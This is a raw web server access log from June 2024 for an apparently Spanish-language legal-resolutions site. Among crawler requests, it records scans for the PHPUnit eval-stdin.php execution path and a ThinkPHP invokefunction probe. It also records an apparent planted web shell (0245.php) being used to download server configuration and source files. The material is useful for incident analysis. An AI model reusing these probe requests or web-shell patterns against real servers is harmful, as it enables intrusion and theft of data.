172.22.2.4 - - [28/Jun/2024:04:07:12 -0500] "GET /BLA/boletinlegal/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [28/Jun/2024:04:07:12 -0500] "GET /BLA/boletinlegal/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [28/Jun/2024:04:07:13 -0500] "GET /BLA/boletinlegal/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [28/Jun/2024:04:07:13 -0500] "GET /BLA/boletinlegal/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [28/Jun/2024:04:07:14 -0500] "GET /BLA/boletinlegal/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [28/Jun/2024:04:07:14 -0500] "GET /BLA/boletinlegal/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [28/Jun/2024:04:07:15 -0500] "GET /BLA/boletinlegal/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [28/Jun/2024:04:07:15 -0500] "GET /BLA/boletinlegal/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [28/Jun/2024:04:07:15 -0500] "GET /BLA/boletinlegal/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [28/Jun/2024:04:07:16 -0500] "GET /BLA/boletinlegal/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [28/Jun/2024:04:07:16 -0500] "GET /BLA/boletinlegal/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [28/Jun/2024:04:07:16 -0500] "GET /BLA/boletinlegal/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [28/Jun/2024:04:07:17 -0500] "GET /BLA/boletinlegal/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [28/Jun/2024:04:07:17 -0500] "GET /BLA/boletinlegal/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
47.128.59.235 - - [28/Jun/2024:04:07:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=server_engines.lib.php&ft=download HTTP/1.1" 200 4354
172.22.2.4 - - [28/Jun/2024:04:07:18 -0500] "GET /BLA/boletinlegal/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [28/Jun/2024:04:07:19 -0500] "GET /BLA/boletinlegal/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [28/Jun/2024:04:07:19 -0500] "GET /BLA/boletinlegal/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
201.245.192.253 - - [28/Jun/2024:04:07:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.59.178 - - [28/Jun/2024:04:07:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=display_export.lib.php&ft=download HTTP/1.1" 200 22657
172.22.2.4 - - [28/Jun/2024:04:07:39 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-095-16.docx HTTP/1.1" 200 20284
47.128.57.214 - - [28/Jun/2024:04:07:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=string.inc.php&ft=download HTTP/1.1" 200 311
201.245.192.253 - - [28/Jun/2024:04:08:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.30.206 - - [28/Jun/2024:04:08:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cplugins%5C&f=TransformationsPlugin.class.php&ft=download&white=1 HTTP/1.1" 200 1284
47.128.28.117 - - [28/Jun/2024:04:08:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=sql.php&ft=download&white=1 HTTP/1.1" 200 5587
201.245.192.253 - - [28/Jun/2024:04:08:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.30.243 - - [28/Jun/2024:04:08:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=common.inc.php&ft=download HTTP/1.1" 200 34488
66.249.66.12 - - [28/Jun/2024:04:08:44 -0500] "GET /BLA/resoluciones/AUTOS%202023/5548.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:04:08:44 -0500] "GET /BLA/resoluciones/AUTOS%202023/08970.pdf HTTP/1.1" 200 549640
172.22.2.4 - - [28/Jun/2024:04:07:20 -0500] "GET /BLA/boletinlegal/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 53195
66.249.66.12 - - [28/Jun/2024:04:08:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0071.pdf HTTP/1.1" 304 -
66.249.66.13 - - [28/Jun/2024:04:08:48 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%20601-650/&sort=name&order=asc HTTP/1.1" 200 12037
66.249.66.12 - - [28/Jun/2024:04:08:48 -0500] "GET /BLA/resoluciones/AUTOS%202023/1053.pdf HTTP/1.1" 200 395122
47.128.27.208 - - [28/Jun/2024:04:08:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4092.pdf&ft=download&white=1 HTTP/1.1" 200 519847
201.245.192.253 - - [28/Jun/2024:04:09:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.27.231 - - [28/Jun/2024:04:09:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Config.class.php&ft=download&white=1 HTTP/1.1" 200 63115
201.245.192.253 - - [28/Jun/2024:04:09:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.36.122 - - [28/Jun/2024:04:09:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=0384.pdf&ft=download&white=1 HTTP/1.1" 200 48114
35.84.118.171 - - [28/Jun/2024:04:09:26 -0500] "HEAD / HTTP/1.1" 200 -
47.128.21.246 - - [28/Jun/2024:04:09:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=sql_query_form.lib.php&ft=download HTTP/1.1" 200 19032
216.245.221.92 - - [28/Jun/2024:04:09:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Jun/2024:04:08:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:04:10:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [28/Jun/2024:04:10:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0624.pdf HTTP/1.1" 304 -
172.22.2.4 - - [28/Jun/2024:04:09:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55442
157.55.39.49 - - [28/Jun/2024:04:11:00 -0500] "GET /images/mantener-calidad-del-aire_optimized.jpeg HTTP/1.1" 200 67646
201.245.192.253 - - [28/Jun/2024:04:11:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:04:11:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20551-600/00000561.tif HTTP/1.1" 200 89970
201.245.192.253 - - [28/Jun/2024:04:11:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
185.180.140.6 - - [28/Jun/2024:04:11:23 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [28/Jun/2024:04:10:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [28/Jun/2024:04:12:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [28/Jun/2024:04:12:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4332.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:04:13:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.126.45 - - [28/Jun/2024:04:13:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cautodeclaracion22%5C&f=presentacion.php&ft=download&white=1 HTTP/1.1" 200 14418
201.245.192.253 - - [28/Jun/2024:04:13:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Jun/2024:04:13:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.22.233 - - [28/Jun/2024:04:13:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=Types.class.php&ft=download HTTP/1.1" 200 30522
47.128.39.58 - - [28/Jun/2024:04:13:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=kses.php&ft=download&white=1 HTTP/1.1" 200 43101
